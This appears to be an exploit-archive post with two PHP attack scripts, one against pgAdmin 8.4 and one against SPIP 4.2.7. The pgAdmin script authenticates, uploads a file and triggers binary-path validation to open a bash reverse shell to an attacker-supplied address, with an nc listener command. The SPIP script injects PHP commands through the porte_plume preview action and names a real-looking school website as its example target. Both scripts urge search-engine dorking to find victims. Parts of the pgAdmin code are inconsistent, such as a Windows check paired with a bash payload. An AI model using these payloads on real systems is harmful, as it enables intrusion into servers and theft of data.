    =============================================================================================================================================| # Title     : pgAdmin 8.4 PHP Code Execution Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.pgadmin.org/download/                                                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.     This vulnerability allows an attacker to execute a reverse connection on the server hosting PGAdmin, posing a severe risk to the integrity   of the database management system and the security of the underlying data.  [+] Description:    The generateReverseShell function: Generates a reverse connection payload that uses netcat (or equivalent) to open a reverse connection with your machine. You will need to replace "YOUR_IP" and "YOUR_PORT" with your machine's IP address and the port you are listening on.    exec in PHP: Runs the command that opens a reverse connection using bash and executes it on the target.[+] How to use it:    Modify "YOUR_IP" and "YOUR_PORT" in the generateReverseShell function to match your machine.    Verify that your machine is listening on the specified port using nc or a similar tool:    nc -lvnp YOUR_PORT[+] Run the code. If the exploit is successful, you will get a reverse connection to the target machine.[+] Line : 156+157        $ip = 'YOUR_IP'; // Replace with your machine's IP        $port = 'YOUR_PORT'; // Replace with the port you want to use[+] Line : 164+165+166           $targetUrl = 'http://target-url.com'; // Replace this with the actual address           $username = 'admin'; // Username (if required)           $password = 'password'; // Password (if required)              [+] Save As poc.php[+] usage : cmd=> php poc.php[+] payload :<?phpclass PGAdminExploit {    private $targetUrl;    private $csrfToken;    private $username;    private $password;    public function __construct($targetUrl, $username = '', $password = '') {        $this->targetUrl = rtrim($targetUrl, '/');        $this->username = $username;        $this->password = $password;    }    public function exploit() {        if ($this->authRequired() && (!$this->username || !$this->password)) {            die("The application requires authentication, please provide valid credentials.\n");        }        if ($this->authRequired()) {            $this->authenticate();            echo "Successfully authenticated to pgAdmin\n";        }        if (!$this->onWindows()) {            die("This exploit is specific to Windows targets!\n");        }        $fileName = 'reverse_shell.php';        $this->fileManagerUploadAndTrigger($fileName, $this->generateReverseShell());    }    private function authRequired() {        $res = $this->sendRequest('GET', $this->targetUrl . '/');        return strpos($res, 'Location: login') !== false;    }    private function onWindows() {        $res = $this->sendRequest('GET', $this->targetUrl . '/browser/js/utils.js');        if ($res) {            $platform = $this->getStringBetween($res, "pgAdmin['platform'] = '", "';");            return $platform == 'win32';        }        return false;    }    private function authenticate() {        $loginPage = $this->sendRequest('GET', $this->targetUrl . '/login');        $this->setCsrfTokenFromLoginPage($loginPage);        $res = $this->sendRequest('POST', $this->targetUrl . '/authenticate/login', [            'csrf_token' => $this->csrfToken,            'email' => $this->username,            'password' => $this->password,            'language' => 'en',            'internal_button' => 'Login'        ]);        if (strpos($res, 'Location: login') !== false) {            die("Failed to authenticate to pgAdmin\n");        }    }    private function setCsrfTokenFromLoginPage($response) {        if (preg_match('/csrfToken": "([\w+.-]+)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } elseif (preg_match('/<input.*?id="csrf_token".*?value="(.*?)"/', $response, $matches)) {            $this->csrfToken = $matches[1];        } else {            die("Failed to obtain the CSRF token\n");        }    }    private function fileManagerUploadAndTrigger($filePath, $fileContents) {        list($transId, $homeFolder) = $this->fileManagerInit();        $formData = [            'newfile' => new CURLFile($filePath, 'application/octet-stream', $filePath),            'mode' => 'add',            'currentpath' => $homeFolder,            'storage_folder' => 'my_storage'        ];        $res = $this->sendRequest('POST', $this->targetUrl . "/file_manager/filemanager/{$transId}/", $formData, true);        if (strpos($res, '"success":1') === false) {            die("Failed to upload file contents\n");        }        $uploadPath = $this->getStringBetween($res, '"Name":"', '"');        echo "Payload uploaded to: {$uploadPath}\n";        $this->sendRequest('POST', $this->targetUrl . '/misc/validate_binary_path', json_encode([            'utility_path' => substr($uploadPath, 0, -15)        ]), true);    }    private function fileManagerInit() {        $res = $this->sendRequest('POST', $this->targetUrl . '/file_manager/init', json_encode([            'dialog_type' => 'storage_dialog',            'supported_types' => ['sql', 'csv', 'json', '*'],            'dialog_title' => 'Storage Manager'        ]));        $transId = $this->getStringBetween($res, '"transId":"', '"');        $homeFolder = $this->getStringBetween($res, '"homedir":"', '"');        if (!$transId || !$homeFolder) {            die("Failed to initialize a file manager transaction Id or home folder\n");        }        return [$transId, $homeFolder];    }    private function sendRequest($method, $url, $data = [], $multipart = false) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);        if ($method == 'POST') {            curl_setopt($ch, CURLOPT_POST, true);            if ($multipart) {                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            } else {                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));            }        }        if ($this->csrfToken) {            curl_setopt($ch, CURLOPT_HTTPHEADER, [                "X-pgA-CSRFToken: {$this->csrfToken}"            ]);        }        $response = curl_exec($ch);        if (curl_errno($ch)) {            die("cURL Error: " . curl_error($ch) . "\n");        }        curl_close($ch);        return $response;    }    private function getStringBetween($string, $start, $end) {        $string = ' ' . $string;        $ini = strpos($string, $start);        if ($ini == 0) return '';        $ini += strlen($start);        $len = strpos($string, $end, $ini) - $ini;        return substr($string, $ini, $len);    }    private function generateReverseShell() {        // حمولة الاتصال العكسي باستخدام Netcat        $ip = 'YOUR_IP'; // استبدل بـ IP الخاص بجهازك        $port = 'YOUR_PORT'; // استبدل بالمنفذ الذي تريد استخدامه        $shell = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/$ip/$port 0>&1'\"); ?>";        return $shell;    }}// مثال على الاستخدام$targetUrl = 'http://target-url.com'; // استبدل هذا بالعنوان الحقيقي$username = 'admin'; // اسم المستخدم (إذا كان مطلوبًا)$password = 'password'; // كلمة المرور (إذا كانت مطلوبة)$exploit = new PGAdminExploit($targetUrl, $username, $password);$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

pgAdmin 8.4 Code Execution 

SPIP version 4.2.7 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.7 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#windows